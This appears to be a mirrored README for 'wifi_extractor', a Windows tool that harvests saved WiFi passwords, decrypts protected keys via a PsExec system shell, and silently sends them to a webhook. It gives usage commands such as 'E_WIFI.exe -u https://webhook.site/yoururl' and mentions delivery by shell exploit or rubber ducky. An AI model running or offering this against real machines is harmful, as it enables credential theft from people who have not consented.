Code Monkey home page Code Monkey logo

wifi_extractor's Introduction

WIFI_Extractor & Wdecrpytor

DISCLAIMER

This is not made for illegal or malicious purposes, I consider it like a post-exploitation tool with legal authority before of use in whatever location you are doing your pentest to check weak and reutilization of passwords, I'm not responsible of any malicious acts that you may do.

Esto no está hecho con fines ilegales o maliciosos, lo considero como una herramienta de post-explotación con autoridad legal antes del uso en cualquier lugar donde esté haciendo su pentest para verificar la debilidad y la reutilización de contraseñas, no soy responsable de cualquier acto malicioso que puedas hacer.

if you run it with python you might need this requeriments

Si lo ejecutas con python tal vez podrias necesitar estos requerimientos

pip install click

pip install elementpath

pip install requests

Script to extract WIFI passwords from a pc uploading it remotely (shell exploit) and send it to a url "silently"(webhook without leaving files and also can be used "offline", physically (rubber ducky). It can detect protected local passwords and try to decrypt it, you must need at least a cmd with admin privileges to be more successful, then with the help of PsExec it will try to open a system shell and execute wdecryptor with the key

Script para extraer contraseñas WIFI de un pc subiendolo remotamente(shell exploit) y enviarlo a una url "silenciosamente"(webhook) También se puede usar "offline", físicamente con un pendrive(rubber ducky). Puede detecar contraseñas protegidas localmente y tratar de descriptarlas, necesitaras al menos una cmd con privilegios de admin para tener mas probabilidad de éxito, luego con la ayuda de PsExec tratará de ejecutar wdecryptor con la key.

Usage: E_WIFI.exe [OPTIONS]

  Options:

  -u, --url TEXT      Webhook/POST URL
  
  -n, --no-txt        No crea el archivo txt | Doesn't create the txt file
  
  -v, --version       Imprime la version | Prints the version
  
  -p, --print-output  Muestra la salida en la terminal | Shows the output in
                      the terminal
                      
  -a, --admin         Indica si la consola actual tiene privilegios de admin |
                      Indicates if the current console has admin privileges
                      
  --help              Show this message and exit.
  

* Offline

python3 E_WIFIoffline.py

CMD or Powershell E_WIFIoffline.exe | ./E_WIFIoffline.exe (You can also double click it)

Creates a txt with the WIFI's ssid and passwords stored in the local machine

Crea un txt con los nombres y las contrasenas WIFI guardadas en la maquina local

* Online

Usages

default usage

python3 E_WIFI.py

CMD or Powershell
E_WIFI.exe | ./E_WIFI.exe

Creates a txt with the WIFI's ssid and passwords stored in the local machine

Crea un txt con los nombres y las contrasenas WIFI guardadas en la maquina local

Another Example

python3 E_WIFI.py -u https://webhook.site/yoururl -n -p

CMD or Powershell

E_WIFI.exe -u https://webhook.site/yoururl -n -p
./E_WIFI.exe -u https://webhook.site/yoururl -n -p

type --help for more detailed info

PD: 

    THE TXT IS CREATED BY DEFAULT -n TURN IT OFF

    EL TXT SE CREA POR DEFECTO -n APAGA LA CREACION

* V1.3 and Wdecryptor Examples

Quick Example of the new function

Ejemplo rapido de la nueva funcion

E_WIFI.exe -p -a -u https://webhooksite... ejemplo nueva funcion

"-a" will answer automatically with "Y" because it indicates that the current console is with admin privileges at least if you don't put this option you will need to put manually the option

"-a" respondera automaticamente con "Y" porque indica que la consola actual tiene al menos privilegios de administrador, si no pones esta opcion tendras que responder manualmente

You will see that in the webhook it will be sent with the decrypted password

Podras ver en el webhook que sera enviado con la contrasena desencriptada ejemplo nueva funcion2

* Using Wdecryptor manually

Also you can use the E_WIFI to extract the keys and then manually use Wdecryptor with an opened system authority cmd

Tambien podras usar E_WIFI para extraer las keys y luego manualmente usar wdecryptor con una cmd abierta con system authority

ejemplo nueva funcion3

it will be saved in a "decrypted.txt" file also with the following format "Encrypted Key : Decrypted"

tambien se guardara en un archivo "decrypted.txt" con el siguiente formato "Key Encriptada : Descriptada"

wifi_extractor's People

Contributors

hrdax avatar

Stargazers

 avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.